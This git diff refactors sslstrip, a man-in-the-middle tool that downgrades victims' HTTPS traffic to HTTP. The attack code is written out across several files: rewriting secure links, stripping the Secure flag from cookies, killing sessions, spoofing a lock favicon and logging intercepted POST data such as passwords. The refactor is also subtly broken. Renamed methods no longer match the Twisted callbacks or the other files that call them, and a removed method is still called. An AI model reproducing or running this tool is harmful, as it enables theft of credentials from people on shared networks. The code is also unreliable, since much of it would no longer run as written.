diff --git a/README.md b/README.md index 80f574c..5dbc025 100755 --- a/README.md +++ b/README.md @@ -5,9 +5,7 @@ Ported from Python v2 to v3 by Jay Townsend (theHarvester, Discover, and DNSreco Requirements: ```pip3 install -r requirements.txt``` - -Run as root to install or run it out of the directory: - ```python3 setup.py install``` +Install the requirements in a virtualenv Running: sslstrip can be run from the source base without installation. diff --git a/requirements.txt b/requirements.txt index 6995dcc..9a1dae5 100644 --- a/requirements.txt +++ b/requirements.txt @@ -2,4 +2,5 @@ setuptools==68.0.0 Twisted==22.10.0 pyopenssl==23.2.0 cryptography==41.0.3 -service_identity==23.1.0 \ No newline at end of file +service_identity==23.1.0 +black==23.7.0 \ No newline at end of file diff --git a/setup.py b/setup.py index c182616..e9f26be 100755 --- a/setup.py +++ b/setup.py @@ -5,7 +5,7 @@ shutil.copyfile("sslstrip.py", "sslstrip/sslstrip") setup(name='sslstrip', - version='1.0', + version='2.0', description='A MITM tool that implements Moxie Marlinspike\'s HTTPS stripping attacks.', author='Moxie Marlinspike', author_email='moxie@thoughtcrime.org', diff --git a/sslstrip.py b/sslstrip.py index 4537bfa..589e3ba 100755 --- a/sslstrip.py +++ b/sslstrip.py @@ -24,89 +24,96 @@ """ -from twisted.web import http +import argparse +import logging + from twisted.internet import reactor +from twisted.web import http +from sslstrip.CookieCleaner import CookieCleaner from sslstrip.StrippingProxy import StrippingProxy from sslstrip.URLMonitor import URLMonitor -from sslstrip.CookieCleaner import CookieCleaner -import sys, getopt, logging, traceback, string, os - -gVersion = "1.0" - - -def usage(): - print("\nsslstrip " + gVersion + " by Moxie Marlinspike") - print("Usage: sslstrip \n") - print("Options:") - print("-w , --write= Specify file to log to (optional).") - print("-p , --post Log only SSL POSTs. 
(default)") - print("-s , --ssl Log all SSL traffic to and from server.") - print("-a , --all Log all SSL and HTTP traffic to and from server.") - print("-l , --listen= Port to listen on (default 10000).") - print("-f , --favicon Substitute a lock favicon on secure requests.") - print("-k , --killsessions Kill sessions in progress.") - print("-h Print this help message.") - print("") - - -def parseOptions(argv): - logFile = 'sslstrip.log' - logLevel = logging.WARNING - listenPort = 10000 - spoofFavicon = False - killSessions = False - - try: - opts, args = getopt.getopt(argv, "hw:l:psafk", - ["help", "write=", "post", "ssl", "all", "listen=", - "favicon", "killsessions"]) - - for opt, arg in opts: - if opt in ("-h", "--help"): - usage() - sys.exit() - elif opt in ("-w", "--write"): - logFile = arg - elif opt in ("-p", "--post"): - logLevel = logging.WARNING - elif opt in ("-s", "--ssl"): - logLevel = logging.INFO - elif opt in ("-a", "--all"): - logLevel = logging.DEBUG - elif opt in ("-l", "--listen"): - listenPort = arg - elif opt in ("-f", "--favicon"): - spoofFavicon = True - elif opt in ("-k", "--killsessions"): - killSessions = True - - return logFile, logLevel, listenPort, spoofFavicon, killSessions - - except getopt.GetoptError: - usage() - sys.exit(2) - - -def main(argv): - (logFile, logLevel, listenPort, spoofFavicon, killSessions) = parseOptions(argv) - - logging.basicConfig(level=logLevel, format='%(asctime)s %(message)s', - filename=logFile, filemode='w') - URLMonitor.getInstance().setFaviconSpoofing(spoofFavicon) - CookieCleaner.getInstance().setEnabled(killSessions) +class SSLStripConfig: + VERSION = "2.0" + DEFAULT_LOGFILE = "sslstrip.log" + DEFAULT_LOGLEVEL = logging.WARNING + DEFAULT_LISTEN_PORT = 10000 + DEFAULT_SPOOF_FAVICON = False + DEFAULT_KILL_SESSIONS = False - strippingFactory = http.HTTPFactory(timeout=10) - strippingFactory.protocol = StrippingProxy - reactor.listenTCP(int(listenPort), strippingFactory) +def initialize_logger(logFile, 
logLevel): + logging.basicConfig( + level=logLevel, format="%(asctime)s %(message)s", filename=logFile, filemode="w" + ) - print("\nsslstrip " + gVersion + " by Moxie Marlinspike running...") +def start_reactor(listenPort, spoofFavicon, killSessions): + URLMonitor.getInstance().setFaviconSpoofing(spoofFavicon) + CookieCleaner.getInstance().set_enabled(killSessions) + strippingFactory = http.HTTPFactory(timeout=10) + strippingFactory.protocol = StrippingProxy + reactor.listenTCP(int(listenPort), strippingFactory) + print(f"\nsslstrip {SSLStripConfig.VERSION} by Moxie Marlinspike running...") reactor.run() -if __name__ == '__main__': - main(sys.argv[1:]) +def main(): + parser = argparse.ArgumentParser(description="sslstrip") + parser.add_argument( + "-w", + "--write", + default=SSLStripConfig.DEFAULT_LOGFILE, + help="Specify file to log to (optional).", + ) + parser.add_argument( + "-p", + "--post", + default=False, + action="store_true", + help="Log only SSL POSTs. (default)", + ) + parser.add_argument( + "-s", + "--ssl", + default=False, + action="store_true", + help="Log all SSL traffic to and from server.", + ) + parser.add_argument( + "-a", + "--all", + default=False, + action="store_true", + help="Log all SSL and HTTP traffic to and from server.", + ) + parser.add_argument( + "-l", + "--listen", + default=SSLStripConfig.DEFAULT_LISTEN_PORT, + help="Port to listen on.", + ) + parser.add_argument( + "-f", + "--favicon", + default=SSLStripConfig.DEFAULT_SPOOF_FAVICON, + action="store_true", + help="Substitute a lock favicon on secure requests.", + ) + parser.add_argument( + "-k", + "--killsessions", + default=SSLStripConfig.DEFAULT_KILL_SESSIONS, + action="store_true", + help="Kill sessions in progress.", + ) + args = parser.parse_args() + + initialize_logger(args.write, SSLStripConfig.DEFAULT_LOGLEVEL) + start_reactor(args.listen, args.favicon, args.killsessions) + + +if __name__ == "__main__": + main() diff --git a/sslstrip/.github/dependabot.yml 
b/sslstrip/.github/dependabot.yml deleted file mode 100644 index fd0d701..0000000 --- a/sslstrip/.github/dependabot.yml +++ /dev/null @@ -1,17 +0,0 @@ -version: 2 -updates: -- package-ecosystem: github-actions - directory: "/" - schedule: - interval: daily - timezone: Europe/London -- package-ecosystem: pip - directory: "/" - schedule: - interval: daily - timezone: Europe/London - open-pull-requests-limit: 10 - target-branch: master - allow: - - dependency-type: direct - - dependency-type: indirect diff --git a/sslstrip/ClientRequest.py b/sslstrip/ClientRequest.py index 75c89fb..05e3cfc 100644 --- a/sslstrip/ClientRequest.py +++ b/sslstrip/ClientRequest.py @@ -15,79 +15,62 @@ # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 # USA # - import urllib.parse import logging import os import sys import random from twisted.web.http import Request -from twisted.web.http import HTTPChannel -from twisted.web.http import HTTPClient -from twisted.internet import ssl -from twisted.internet import defer -from twisted.internet import reactor -from twisted.internet.protocol import ClientFactory -from .ServerConnectionFactory import ServerConnectionFactory -from .ServerConnection import ServerConnection -from .SSLServerConnection import SSLServerConnection -from .URLMonitor import URLMonitor -from .CookieCleaner import CookieCleaner -from .DnsCache import DnsCache +from twisted.internet import ssl, defer, reactor +from sslstrip.ServerConnectionFactory import ServerConnectionFactory +from sslstrip.ServerConnection import ServerConnection +from sslstrip.SSLServerConnection import SSLServerConnection +from sslstrip.URLMonitor import URLMonitor +from sslstrip.CookieCleaner import CookieCleaner +from sslstrip.DnsCache import DnsCache class ClientRequest(Request): - """ This class represents incoming client requests and is essentially where - the magic begins. 
Here we remove the client headers we dont like, and then + """This class represents incoming client requests and is essentially where + the magic begins. Here we remove the client headers we don't like, and then respond with either favicon spoofing, session denial, or proxy through HTTP or SSL to the server. """ def __init__(self, channel, queued, reactor=reactor): - Request.__init__(self, channel, queued) + super(ClientRequest, self).__init__(channel, queued) self.reactor = reactor self.urlMonitor = URLMonitor.getInstance() self.cookieCleaner = CookieCleaner.getInstance() self.dnsCache = DnsCache.getInstance() - # self.uniqueId = random.randint(0, 10000) - def cleanHeaders(self): - headers = self.getAllHeaders().copy() - - if 'accept-encoding' in headers: - del headers['accept-encoding'] - - if 'if-modified-since' in headers: - del headers['if-modified-since'] - - if 'cache-control' in headers: - del headers['cache-control'] - + headers_to_remove = ["accept-encoding", "if-modified-since", "cache-control"] + headers = { + k: v for k, v in self.getAllHeaders().items() if k not in headers_to_remove + } return headers def getPathFromUri(self): - if self.uri.find("http://") == 0: - index = self.uri.find('/', 7) - return self.uri[index:] - - return self.uri + if self.uri.startswith("http://"): + return self.uri[self.uri.find("/", 7):] + return self.uri def getPathToLockIcon(self): - if os.path.exists("lock.ico"): - return "lock.ico" - - scriptPath = os.path.abspath(os.path.dirname(sys.argv[0])) - scriptPath = os.path.join(scriptPath, "../share/sslstrip/lock.ico") - - if os.path.exists(scriptPath): - return scriptPath - + paths = ["lock.ico", "../share/sslstrip/lock.ico"] + for path in paths: + if os.path.exists(path): + return path logging.warning("Error: Could not find lock.ico") return "lock.ico" - def handleHostResolvedSuccess(self, address): - logging.debug("Resolved host successfully: %s -> %s" % (self.getHeader('host'), address)) + def handleHostResolved(self, address, error=None): + if 
error: + logging.warning(f"Host resolution error: {str(error)}") + self.finish() + return + + logging.debug( + f"Resolved host successfully: {self.getHeader('host')} -> {address}" + ) host = self.getHeader("host") headers = self.cleanHeaders() client = self.getClientIP() @@ -95,57 +78,60 @@ def handleHostResolvedSuccess(self, address): self.content.seek(0, 0) postData = self.content.read() - url = 'http://' + host + path + url = "http://" + host + path self.dnsCache.cacheResolution(host, address) if not self.cookieCleaner.isClean(self.method, client, host, headers): logging.debug("Sending expired cookies...") - self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, - host, headers, path)) + self.sendExpiredCookies( + host, + path, + self.cookieCleaner.getExpireHeaders( + self.method, client, host, headers, path + ), + ) elif self.urlMonitor.isSecureFavicon(client, path): logging.debug("Sending spoofed favicon response...") self.sendSpoofedFaviconResponse() elif self.urlMonitor.isSecureLink(client, url): logging.debug("Sending request via SSL...") - self.proxyViaSSL(address, self.method, path, postData, headers, - self.urlMonitor.getSecurePort(client, url)) + self.proxyRequest( + address, + self.method, + path, + postData, + headers, + self.urlMonitor.getSecurePort(client, url), + is_ssl=True, + ) else: logging.debug("Sending request via HTTP...") - self.proxyViaHTTP(address, self.method, path, postData, headers) - - def handleHostResolvedError(self, error): - logging.warning("Host resolution error: " + str(error)) - self.finish() + self.proxyRequest( + address, self.method, path, postData, headers, is_ssl=False + ) def resolveHost(self, host): address = self.dnsCache.getCachedAddress(host) - - if address != None: - logging.debug("Host cached.") - return defer.succeed(address) - else: - logging.debug("Host not cached.") - return reactor.resolve(host) + logging.debug("Host cached." 
if address else "Host not cached.") + return defer.succeed(address) if address else self.reactor.resolve(host) def process(self): - logging.debug("Resolving host: %s" % (self.getHeader('host'))) - host = self.getHeader('host') + logging.debug(f"Resolving host: {self.getHeader('host')}") + host = self.getHeader("host") deferred = self.resolveHost(host) - - deferred.addCallback(self.handleHostResolvedSuccess) - deferred.addErrback(self.handleHostResolvedError) - - def proxyViaHTTP(self, host, method, path, postData, headers): - connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) - connectionFactory.protocol = ServerConnection - self.reactor.connectTCP(host, 80, connectionFactory) - - def proxyViaSSL(self, host, method, path, postData, headers, port): - clientContextFactory = ssl.ClientContextFactory() - connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) - connectionFactory.protocol = SSLServerConnection - self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory) + deferred.addBoth(self.handleHostResolved) + + def proxyRequest( + self, host, method, path, postData, headers, port=80, is_ssl=False + ): + connectionFactory = ServerConnectionFactory( + method, path, postData, headers, self + ) + connectionFactory.protocol = SSLServerConnection if is_ssl else ServerConnection + connect_func = self.reactor.connectSSL if is_ssl else self.reactor.connectTCP + clientContextFactory = ssl.ClientContextFactory() if is_ssl else None + connect_func(host, port, connectionFactory, clientContextFactory) def sendExpiredCookies(self, host, path, expireHeaders): self.setResponseCode(302) @@ -158,11 +144,11 @@ def sendExpiredCookies(self, host, path, expireHeaders): self.finish() def sendSpoofedFaviconResponse(self): - icoFile = open(self.getPathToLockIcon()) - - self.setResponseCode(200) - self.setHeader("Content-type", "image/x-icon") - self.write(icoFile.read()) - - icoFile.close() + try: + with 
open(self.getPathToLockIcon(), "rb") as icoFile: + self.setResponseCode(200) + self.setHeader("Content-type", "image/x-icon") + self.write(icoFile.read()) + except IOError: + logging.warning("File error: Couldn't open or read the file") self.finish() diff --git a/sslstrip/CookieCleaner.py b/sslstrip/CookieCleaner.py index 1a1c2c0..18f02b4 100644 --- a/sslstrip/CookieCleaner.py +++ b/sslstrip/CookieCleaner.py @@ -23,7 +23,7 @@ class CookieCleaner: """This class cleans cookies we haven't seen before. The basic idea is to kill sessions, which isn't entirely straight-forward. Since we want this to - be generalized, there's no way for us to know exactly what cookie we're trying + be generalised, there's no way for us to know exactly what cookie we're trying to kill, which also means we don't know what domain or path it has been set for. The rule with cookies is that specific overrides general. So cookies that are @@ -34,75 +34,67 @@ class CookieCleaner: The best we can do is guess, so we just try to cover our bases by expiring cookies in a few different ways. The most obvious thing to do is look for individual cookies and nail the ones we haven't seen coming from the server, but the problem is that cookies are often - set by Javascript instead of a Set-Cookie header, and if we block those the site - will think cookies are disabled in the browser. So we do the expirations and whitlisting - based on client,server tuples. The first time a client hits a server, we kill whatever + set by Javascript instead of a Set-Cookie header, and if we block those, the site + will think cookies are disabled in the browser. So we do the expirations and allow-listing + based on client, server tuples. The first time a client hits a server, we kill whatever cookies we see then. After that, we just let them through. Not perfect, but pretty effective. 
""" _instance = None - def getInstance(): - if CookieCleaner._instance is None: - CookieCleaner._instance = CookieCleaner() - - return CookieCleaner._instance - - getInstance = staticmethod(getInstance) + @classmethod + def getInstance(cls): + if cls._instance is None: + cls._instance = cls() + return cls._instance def __init__(self): - self.cleanedCookies = set() + self.cleaned_cookies = set() self.enabled = False - def setEnabled(self, enabled): + def set_enabled(self, enabled): self.enabled = enabled - def isClean(self, method, client, host, headers): - if method == "POST": - return True - if not self.enabled: - return True - if not self.hasCookies(headers): + def is_clean(self, method, client, host, headers): + if method == "POST" or not self.enabled or not self.has_cookies(headers): return True + return (client, self.get_domain_for(host)) in self.cleaned_cookies - return (client, self.getDomainFor(host)) in self.cleanedCookies + def get_expire_headers(self, method, client, host, headers, path): + domain = self.get_domain_for(host) + self.cleaned_cookies.add((client, domain)) - def getExpireHeaders(self, method, client, host, headers, path): - domain = self.getDomainFor(host) - self.cleanedCookies.add((client, domain)) - - expireHeaders = [] - - for cookie in headers['cookie'].split(";"): + expire_headers = [] + for cookie in headers["cookie"].split(";"): cookie = cookie.split("=")[0].strip() - expireHeadersForCookie = self.getExpireCookieStringFor(cookie, host, domain, path) - expireHeaders.extend(expireHeadersForCookie) - - return expireHeaders - - def hasCookies(self, headers): - return 'cookie' in headers + expire_headers.extend( + self.get_expire_cookie_string_for(cookie, host, domain, path) + ) - def getDomainFor(self, host): - hostParts = host.split(".") - return "." + hostParts[-2] + "." 
+ hostParts[-1] - def getExpireCookieStringFor(self, cookie, host, domain, path): - pathList = path.split("/") - expireStrings = list() + return expire_headers - expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain + - ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") + @staticmethod + def has_cookies(headers): + return "cookie" in headers - expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host + - ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") + @staticmethod + def get_domain_for(host): + host_parts = host.split(".") + return "." + host_parts[-2] + "." + host_parts[-1] - if len(pathList) > 2: - expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + - domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") + @staticmethod + def get_expire_cookie_string_for(cookie, host, domain, path): + path_list = path.split("/") + expire_strings = [] - expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + - host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") + base_str_format = f"{cookie}=EXPIRED;Path={{}};Domain={{}};Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n" + expire_strings.append(base_str_format.format("/", domain)) + expire_strings.append(base_str_format.format("/", host)) + if len(path_list) > 2: + path_sub_part = "/" + path_list[1] + expire_strings.append(base_str_format.format(path_sub_part, domain)) + expire_strings.append(base_str_format.format(path_sub_part, host)) - return expireStrings + return expire_strings diff --git a/sslstrip/DnsCache.py b/sslstrip/DnsCache.py index ee35411..f791f68 100644 --- a/sslstrip/DnsCache.py +++ b/sslstrip/DnsCache.py @@ -17,10 +17,9 @@ def getCachedAddress(self, host): return None + @staticmethod def getInstance(): if DnsCache._instance is None: DnsCache._instance = DnsCache() return DnsCache._instance - - getInstance = staticmethod(getInstance) diff --git a/sslstrip/SSLServerConnection.py b/sslstrip/SSLServerConnection.py index af90910..9b0d126 
100644 --- a/sslstrip/SSLServerConnection.py +++ b/sslstrip/SSLServerConnection.py @@ -28,81 +28,91 @@ class SSLServerConnection(ServerConnection): via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies. """ - cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE) + cookieExpression = re.compile( + r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE + ) cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE) - iconExpression = re.compile(r"", - re.IGNORECASE) + iconExpression = re.compile( + r"", + re.IGNORECASE, + ) linkExpression = re.compile( - r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE) + r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", + re.IGNORECASE, + ) headExpression = re.compile(r"", re.IGNORECASE) def __init__(self, command, uri, postData, headers, client): - ServerConnection.__init__(self, command, uri, postData, headers, client) + super().__init__(command, uri, postData, headers, client) - def getLogLevel(self): + @property + def log_level(self): return logging.INFO - def getPostPrefix(self): + @property + def post_prefix(self): return "SECURE POST" - def handleHeader(self, key, value): - if key.lower() == 'set-cookie': - value = SSLServerConnection.cookieExpression.sub("\g<1>", value) + def handle_header(self, key, value): + if key.lower() == "set-cookie": + value = self.cookieExpression.sub("\g<1>", value) + super().handleHeader(key, value) - ServerConnection.handleHeader(self, key, value) + @staticmethod + def strip_file_from_path(path): + stripped_path, _, _ = path.rpartition("/") + return stripped_path - def stripFileFromPath(self, path): - (strippedPath, lastSlash, file) = path.rpartition('/') - return strippedPath + def build_absolute_link(self, link): + absolute_link = "" + if not link.startswith(("http", "/")): + absolute_link 
= "http://{}{}/{}".format( + self.headers["host"], self.strip_file_from_path(self.uri), link + ) - def buildAbsoluteLink(self, link): - absoluteLink = "" + logging.debug("Found path-relative link in secure transmission: %s", link) + logging.debug("New Absolute path-relative link: %s", absolute_link) + elif not link.startswith("http"): + absolute_link = "http://{}{}".format(self.headers["host"], link) - if (not link.startswith('http')) and (not link.startswith('/')): - absoluteLink = "http://" + self.headers['host'] + self.stripFileFromPath(self.uri) + '/' + link + logging.debug("New Absolute link: %s", absolute_link) - logging.debug("Found path-relative link in secure transmission: " + link) - logging.debug("New Absolute path-relative link: " + absoluteLink) - elif not link.startswith('http'): - absoluteLink = "http://" + self.headers['host'] + link + if absolute_link: + absolute_link = absolute_link.replace("&", "&") + self.urlMonitor.addSecureLink(self.client.getClientIP(), absolute_link) - logging.debug("Found relative link in secure transmission: " + link) - logging.debug("New Absolute link: " + absoluteLink) - - if not absoluteLink == "": - absoluteLink = absoluteLink.replace('&', '&') - self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink); - - def replaceCssLinks(self, data): - iterator = re.finditer(SSLServerConnection.cssExpression, data) + def replace_links_with_patterns(self, data, pattern, group_num): + iterator = re.finditer(pattern, data) for match in iterator: - self.buildAbsoluteLink(match.group(1)) + self.build_absolute_link(match.group(group_num)) return data - def replaceFavicon(self, data): - match = re.search(SSLServerConnection.iconExpression, data) - - if match != None: - data = re.sub(SSLServerConnection.iconExpression, - "", data) + def replace_favicon(self, data): + match = re.search(self.iconExpression, data) + if match: + data = re.sub( + self.iconExpression, + '', + data, + ) else: - data = 
re.sub(SSLServerConnection.headExpression, - "", data) + data = re.sub( + self.headExpression, + '', + data, + ) return data - def replaceSecureLinks(self, data): - data = ServerConnection.replaceSecureLinks(self, data) - data = self.replaceCssLinks(data) + def replace_secure_links(self, data): + data = super().replace_secure_links(data) + data = self.replace_links_with_patterns(data, self.cssExpression, 1) if self.urlMonitor.isFaviconSpoofing(): - data = self.replaceFavicon(data) + data = self.replace_favicon(data) - iterator = re.finditer(SSLServerConnection.linkExpression, data) - - for match in iterator: - self.buildAbsoluteLink(match.group(10)) + data = self.replace_links_with_patterns(data, self.linkExpression, 10) return data diff --git a/sslstrip/ServerConnection.py b/sslstrip/ServerConnection.py index a71651d..ea75168 100644 --- a/sslstrip/ServerConnection.py +++ b/sslstrip/ServerConnection.py @@ -24,16 +24,14 @@ class ServerConnection(HTTPClient): - """ The server connection is where we do the bulk of the stripping. Everything that - comes back is examined. The headers we dont like are removed, and the links are stripped - from HTTPS to HTTP. 
- """ + """The server connection is where we do the bulk of the stripping.""" urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE) urlType = re.compile(r"https://", re.IGNORECASE) - urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE) + urlExplicitPort = re.compile(r"https://([a-zA-Z0-9.]+):[0-9]+/", re.IGNORECASE) def __init__(self, command, uri, postData, headers, client): + super().__init__() self.command = command self.uri = uri self.postData = postData @@ -45,109 +43,104 @@ def __init__(self, command, uri, postData, headers, client): self.contentLength = None self.shutdownComplete = False - def getLogLevel(self): + @property + def log_level(self): return logging.DEBUG - def getPostPrefix(self): + @property + def post_prefix(self): return "POST" - def sendRequest(self): - logging.log(self.getLogLevel(), "Sending Request: %s %s" % (self.command, self.uri)) + def send_request(self): + logging.log(self.log_level, f"Sending Request: {self.command} {self.uri}") self.sendCommand(self.command, self.uri) - def sendHeaders(self): + def send_headers(self): for header, value in self.headers.items(): - logging.log(self.getLogLevel(), "Sending header: %s : %s" % (header, value)) + logging.log(self.log_level, f"Sending header: {header} : {value}") self.sendHeader(header, value) - self.endHeaders() - def sendPostData(self): - logging.warning(self.getPostPrefix() + " Data (" + self.headers['host'] + "):\n" + str(self.postData)) + def send_post_data(self): + logging.warning( + f"{self.post_prefix} Data ({self.headers['host']}):\n{str(self.postData)}" + ) self.transport.write(self.postData) - def connectionMade(self): - logging.log(self.getLogLevel(), "HTTP connection made.") - self.sendRequest() - self.sendHeaders() - - if self.command == 'POST': - self.sendPostData() + def connection_made(self): + logging.log(self.log_level, "HTTP connection made.") + self.send_request() + self.send_headers() + if self.command == 
"POST": + self.send_post_data() - def handleStatus(self, version, code, message): - logging.log(self.getLogLevel(), "Got server response: %s %s %s" % (version, code, message)) + def handle_status(self, version, code, message): + logging.log(self.log_level, f"Got server response: {version} {code} {message}") self.client.setResponseCode(int(code), message) - def handleHeader(self, key, value): - logging.log(self.getLogLevel(), "Got server header: %s:%s" % (key, value)) - - if key.lower() == 'location': - value = self.replaceSecureLinks(value) - - if key.lower() == 'content-type': - if value.find('image') != -1: - self.isImageRequest = True - logging.debug("Response is image content, not scanning...") - - if key.lower() == 'content-encoding': - if value.find('gzip') != -1: - logging.debug("Response is compressed...") - self.isCompressed = True - elif key.lower() == 'content-length': - self.contentLength = value - elif key.lower() == 'set-cookie': + def handle_header(self, key, value): + logging.log(self.log_level, f"Got server header: {key}:{value}") + value = self.replace_secure_links(value) if key.lower() == "location" else value + self.set_image_request(value) if key.lower() == "content-type" else value + self.set_compressed(value) if key.lower() == "content-encoding" else value + self.contentLength = ( + value if key.lower() == "content-length" else self.contentLength + ) + if key.lower() in ["set-cookie", "content-length"]: self.client.responseHeaders.addRawHeader(key, value) else: self.client.setHeader(key, value) - def handleEndHeaders(self): - if self.isImageRequest and self.contentLength != None: - self.client.setHeader("Content-Length", self.contentLength) + def set_image_request(self, value): + if "image" in value: + self.isImageRequest = True + logging.debug("Response is image content, not scanning...") + + def set_compressed(self, value): + if "gzip" in value: + logging.debug("Response is compressed...") + self.isCompressed = True - if self.length == 0: + 
def handle_end_headers(self): + if self.isImageRequest and self.contentLength is not None: + self.client.setHeader("Content-Length", self.contentLength) + if not self.length: self.shutdown() - def handleResponsePart(self, data): - if self.isImageRequest: - self.client.write(data) - else: - HTTPClient.handleResponsePart(self, data) + def handle_response_part(self, data): + self.client.write(data) if self.isImageRequest else super().handleResponsePart( + data + ) - def handleResponseEnd(self): - if self.isImageRequest: - self.shutdown() - else: - HTTPClient.handleResponseEnd(self) + def handle_response_end(self): + self.shutdown() if self.isImageRequest else super().handleResponseEnd() - def handleResponse(self, data): + def handle_response(self, data): if self.isCompressed: logging.debug("Decompressing content...") - data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read() + data = gzip.GzipFile("", "rb", 9, StringIO(data)).read() - logging.log(self.getLogLevel(), "Read from server:\n" + data) + logging.log(self.log_level, f"Read from server:\n{data}") - data = self.replaceSecureLinks(data) + data = self.replace_secure_links(data) - if self.contentLength != None: - self.client.setHeader('Content-Length', len(data)) + if self.contentLength is not None: + self.client.setHeader("Content-Length", len(data)) self.client.write(data) self.shutdown() - def replaceSecureLinks(self, data): - iterator = re.finditer(ServerConnection.urlExpression, data) + def replace_secure_links(self, data): + iterator = re.finditer(self.urlExpression, data) for match in iterator: url = match.group() - - logging.debug("Found secure reference: " + url) - - url = url.replace('https://', 'http://', 1) - url = url.replace('&', '&') + logging.debug(f"Found secure reference: {url}") + url = url.replace("https://", "http://", 1).replace("&", "&") self.urlMonitor.addSecureLink(self.client.getClientIP(), url) - data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data) - return 
re.sub(ServerConnection.urlType, 'http://', data) + data = self.urlExplicitPort.sub(r"http://\1/", data) + return self.urlType.sub("http://", data) def shutdown(self): if not self.shutdownComplete: diff --git a/sslstrip/ServerConnectionFactory.py b/sslstrip/ServerConnectionFactory.py index 3d0497d..d88ae44 100644 --- a/sslstrip/ServerConnectionFactory.py +++ b/sslstrip/ServerConnectionFactory.py @@ -1,28 +1,22 @@ -# Copyright (c) 2004-2009 Moxie Marlinspike -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# +""" +This file is licensed under the GNU General Public License version 3. +Copyright (c) 2004-2009 Moxie Marlinspike +""" import logging from twisted.internet.protocol import ClientFactory class ServerConnectionFactory(ClientFactory): + """ + This class is used to create a connection to the server. + """ def __init__(self, command, uri, postData, headers, client): + """ + Initialize the ServerConnectionFactory with remote server details, + as well as a client reference for proxying requests. 
+ """ self.command = command self.uri = uri self.postData = postData @@ -30,15 +24,30 @@ def __init__(self, command, uri, postData, headers, client): self.client = client def buildProtocol(self, addr): - return self.protocol(self.command, self.uri, self.postData, self.headers, self.client) + """ + Build protocol creates an instance of the protocol to be used for the connection. + """ + return self.protocol( + self.command, self.uri, self.postData, self.headers, self.client + ) def clientConnectionFailed(self, connector, reason): + """ + This function is called if connection to the server fails. + """ logging.debug("Server connection failed.") - destination = connector.getDestination() + # Retry connection with SSL if not on port 443 if destination.port != 443: logging.debug("Retrying via SSL") - self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443) + self.client.proxyViaSSL( + self.headers["host"], + self.command, + self.uri, + self.postData, + self.headers, + 443, + ) else: self.client.finish() diff --git a/sslstrip/StrippingProxy.py b/sslstrip/StrippingProxy.py index 5747da6..abd9d50 100644 --- a/sslstrip/StrippingProxy.py +++ b/sslstrip/StrippingProxy.py @@ -17,13 +17,13 @@ # from twisted.web.http import HTTPChannel -from .ClientRequest import ClientRequest +from sslstrip.ClientRequest import ClientRequest class StrippingProxy(HTTPChannel): - """sslstrip is, at heart, a transparent proxy server that does some unusual things. + """Sslstrip is, at heart, a transparent proxy server that does some unusual things. This is the basic proxy server class, where we get callbacks for GET and POST methods. - We then proxy these out using HTTP or HTTPS depending on what information we have about + We are then proxy this out using HTTP or HTTPS depending on what information we have about the (connection, client_address) tuple in our cache. 
""" diff --git a/sslstrip/URLMonitor.py b/sslstrip/URLMonitor.py index 956d655..ff5ab53 100644 --- a/sslstrip/URLMonitor.py +++ b/sslstrip/URLMonitor.py @@ -1,4 +1,3 @@ -# Copyright (c) 2004-2009 Moxie Marlinspike # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License as @@ -26,7 +25,9 @@ class URLMonitor: """ # Start the arms race, and end up here... - javascriptTrickery = [re.compile(r"http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")] + javascriptTrickery = [ + re.compile(r"http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html") + ] _instance = None def __init__(self): @@ -60,8 +61,8 @@ def addSecureLink(self, client, url): if portIndex != -1: host = host[0:portIndex] - port = host[portIndex + 1:] - if len(port) == 0: + port = host[portIndex + 1 :] + if not port.isdigit(): port = 443 url = method + host + path @@ -76,12 +77,13 @@ def isFaviconSpoofing(self): return self.faviconSpoofing def isSecureFavicon(self, client, url): - return (self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1) + return (self.faviconSpoofing == True) and ( + url.find("favicon-x-favicon-x.ico") != -1 + ) + @staticmethod def getInstance(): if URLMonitor._instance is None: URLMonitor._instance = URLMonitor() return URLMonitor._instance - - getInstance = staticmethod(getInstance)